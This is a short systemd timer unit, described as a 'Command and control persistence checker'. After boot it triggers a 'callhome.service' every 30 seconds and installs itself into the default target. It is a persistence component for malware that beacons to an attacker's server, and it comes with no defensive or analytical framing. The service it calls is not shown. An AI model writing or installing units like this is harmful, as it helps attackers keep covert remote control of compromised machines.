[Unit]
Description=Command and control persistence checker

[Timer]
OnBootSec=15m
OnUnitActiveSec=30s
Unit=callhome.service

[Install]
WantedBy=default.target